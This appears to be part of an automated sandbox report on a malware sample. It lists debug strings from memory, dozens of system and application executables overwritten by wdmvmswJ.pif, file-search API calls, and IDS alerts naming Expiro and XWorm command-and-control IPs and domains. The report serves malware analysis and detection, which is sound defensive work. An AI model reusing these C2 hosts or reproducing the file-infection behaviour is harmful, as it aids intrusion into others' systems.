Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	4_2_02AF5908
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	13_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	13_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	13_2_0001532E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_0001532E

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49708 -> 54.244.188.177:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:65093 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:51366 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:61527 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60770 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 62.60.190.120:7923 -> 192.168.2.8:49727
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 62.60.190.120:7923 -> 192.168.2.8:49727
